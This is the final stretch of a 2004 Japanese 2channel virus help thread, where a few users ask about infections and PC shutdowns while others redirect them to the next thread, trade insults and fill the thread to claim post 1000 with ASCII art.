このスレは埋め立て中につき、質問は↓ここへどうぞ
【正式】ウィルス情報&質問 総合スレッド☆Part15
http://pc.2ch.net/test/read.cgi/sec/1068311899/

 注意★このスレのpart16を立てないように★注意
======================

970 :名無しさん@お腹いっぱい。:04/01/26 12:51
videogirls_jpがスタートアップに勝手に登録されてしまう
ウイルスってなんた名前でしたっけ??

971 :名無しさん@お腹いっぱい。:04/01/26 15:27
>>970
>969

972 :名無しさん@お腹いっぱい。:04/01/26 16:02


973 :名無しさん@お腹いっぱい。:04/01/27 11:48
W32.Yabup.@so ちうウィルスに会社の100台以上のPCが感染しちゃったようです。嶋も取もまだ対応してくれません。
いったいどうしたらいいのでしょうか。もう朝から対応でしぬぽ。

974 :名無しさん@お腹いっぱい。:04/01/27 12:09
>>973たった数個上にあるこんなでかいコピペが目に
入らないのか?
======================
このスレは埋め立て中につき、質問は↓ここへどうぞ
【正式】ウィルス情報&質問 総合スレッド☆Part15
http://pc.2ch.net/test/read.cgi/sec/1068311899/

 注意★このスレのpart16を立てないように★注意
======================





975 :名無しさん@お腹いっぱい。:04/01/27 13:04
>>974
ウィルス名嫁。ばーか。

976 :名無しさん@お腹いっぱい。:04/01/27 13:33
みなもちつけ。それに>>973も縁起でもない冗談カキコすな。

977 :名無しさん@お腹いっぱい。:04/01/27 16:28
そろそろPart16作った方がいいんでないの?

978 :名無しさん@お腹いっぱい。:04/01/27 16:34
>>977
立てるな!
http://pc.2ch.net/test/read.cgi/sec/1068311899/
こっち行け

979 :名無しさん@お腹いっぱい。:04/01/27 16:52
>>978
うっさい、ハゲ!

980 :名無しさん@お腹いっぱい。:04/01/27 16:59
やーい、ばーか、ばーか

981 :名無しさん@お腹いっぱい。:04/01/27 20:03
(゚∀゚)

982 :名無しさん@お腹いっぱい。:04/01/27 20:38
誰か助けて・・・

パソコンが勝手に切れる・・・
インターネットセキュリティー入れてるんだけど
これってウイルス??
さっきから50秒に1回ぐらい切れる・・・


983 :名無しさん@お腹いっぱい。:04/01/27 20:45
ウィルスに感染したあとリカバリすればウィルス消滅しますよね?

984 :名無しさん@お腹いっぱい。:04/01/27 21:36
>>982
ノートPCの電源ケーブルの接触が悪くて、そういう症状になったことがある。
ACアダプタを交換したら治った。


そういうのでなくて?

985 :名無しさん@お腹いっぱい。:04/01/27 21:44
>>982
>>984
ここでやるなよ。

986 :名無しさん@お腹いっぱい。:04/01/28 01:48
======================
このスレは埋め立て中につき、質問は↓ここへどうぞ
【正式】ウィルス情報&質問 総合スレッド☆Part15
http://pc.2ch.net/test/read.cgi/sec/1068311899/

 注意★このスレのpart16を立てないように★注意
======================

987 :占有屋(弟) ◆Ck9628Zw6A :04/01/28 02:33
こんばんわ

988 :占有屋(弟) ◆Ck9628Zw6A :04/01/28 02:35
では遠慮なく埋め立てさせて貰います

989 :占有屋(弟) ◆Ck9628Zw6A :04/01/28 02:37
次スレ告知

======================
このスレは埋め立て中につき、質問は↓ここへどうぞ
【正式】ウィルス情報&質問 総合スレッド☆Part15
http://pc.2ch.net/test/read.cgi/sec/1068311899/

 注意★このスレのpart16を立てないように★注意
======================

990 :占有屋(弟) ◆Ck9628Zw6A :04/01/28 02:38
みんなの寝静まった深夜に登場
これぞ1000鳥の極意

ナンチャッテ

991 :占有屋(弟) ◆Ck9628Zw6A :04/01/28 02:41
でもね、次スレがソコソコ伸びてるのに
970〜980位で止まっちゃってるスレがあるのは
板のために良くないと思う

992 :占有屋(弟) ◆Ck9628Zw6A :04/01/28 02:43
だから私が敢えて埋め立てているんです(エヘン

993 :占有屋(弟) ◆Ck9628Zw6A :04/01/28 02:45
ナンチャッテ


|-`)。oO(実は1000が取りたいだけです…)

994 :占有屋(弟) ◆Ck9628Zw6A :04/01/28 02:47

      \∧_ヘ     / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
 ,,、,、,,, / \〇ノゝ∩ < マターリと1000取り合戦、いくぞゴルァ!!
    /三√ ゚Д゚) /  \____________  ,,、,、,,,
     /三/| ゚U゚|\      ,,、,、,,,                       ,,、,、,,,
 ,,、,、,,, U (:::::::::::)  ,,、,、,,,         \オーーーーーーーッ!!/
      //三/|三|\     ∧_∧∧_∧ ∧_∧∧_∧∧_∧∧_∧
      ∪  ∪       (    )    (     )   (    )    )
 ,,、,、,,,       ,,、,、,,,  ∧_∧∧_∧∧_∧ ∧_∧∧_∧∧_∧∧_∧
      ,,、,、,,,       (    )    (    )    (    )    (    )

995 :名無しさん@お腹いっぱい。:04/01/28 02:53
埋め立て屋諸君へ 適当に埋め立ててかまわんが、
999番あたりにこのコピペを貼ってといてくれ。あわて
もんが重複スレ立てるとスレ削除依頼メンドイからな。

======================
次スレはこちらへ↓です。
【正式】ウィルス情報&質問 総合スレッド☆Part15
http://pc.2ch.net/test/read.cgi/sec/1068311899/

注意★このスレのpart16を立てないでください★注意
======================

996 :占有屋(弟) ◆Ck9628Zw6A :04/01/28 03:01
>>995
「諸君」じゃなくて俺ひとりのような…(w
コピペは了解

997 :占有屋(弟) ◆Ck9628Zw6A :04/01/28 03:02
とかなんとか言いながら
>>995が1000を取ろうと虎視眈々

と考えちゃうのは俺の深読み?

998 :名無しさん@お腹いっぱい。:04/01/28 03:04
1000get

999 :占有屋(弟) ◆Ck9628Zw6A :04/01/28 03:06
ま、それでもいっか
埋め立てが俺の使命
そして約束も果たそう


======================
次スレはこちらへ↓です。
【正式】ウィルス情報&質問 総合スレッド☆Part15
http://pc.2ch.net/test/read.cgi/sec/1068311899/

注意★このスレのpart16を立てないでください★注意
======================

1000 :占有屋(弟) ◆Ck9628Zw6A :04/01/28 03:06

                  /:|.             /:|
                 / .:::|            /  ::|
                |  ...:::|_          /   :::|
               i       ̄ ̄⌒゙゙^――/   ::::::|
              /                  :::::::::\
              /|・\           ./・>    :::::::::\
             /ミ\ \         / /彡 i し./:::::::\
             /  ミ\.\ヽ|||liiiii||/ /./彡   ノ (::::::::::::::::::\
            /    ミ\\|||iii||l//彡     '~ヽ  :::::::::::::::\
           /        ̄    ̄,,、          /:::::::::::::::::.\
1000ゲト━━━/  \ /  ,,____ _,/ ̄ \ \    /::::::::::::::::::::::::::::\━━━━!!!!!
         \    |.. | /└└└└\../\    /:::::::::::::::::::::::::::::::::/
           \    ∨.|lllllllllllllllllllllllllllllllllllllllll|  /::::::::::::::::::::::::::::::::::/
            \   |.|llllllllllll;/⌒/⌒   |    ::::::::::::::::::::::::/
              \ |.|lllllllll;   ./ .   . |    :::::::::::::::::::/
              /  |.|llllll|′  /    . |    | ::::::::/|
              /  |.|llll|    |     .∧〔   / ::::::::::::::::\
            / }.∧lll    |    ../ /  /   :::::::::::::::::\
           /   /| \┌┌┌┌┌/./ /:::      :::::::::::::::::\
         /    ( ゙゙^^¨^¨゙゙¨  ̄ ̄ ̄ /:::::::::::         ::::::::::\
        /     ヽー─¬ー〜ー――― :::::::::::::

1001 :1001:Over 1000 Thread
このスレッドは1000を超えました。
もう書けないので、新しいスレッドを立ててくださいです。。。

330 KB
★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)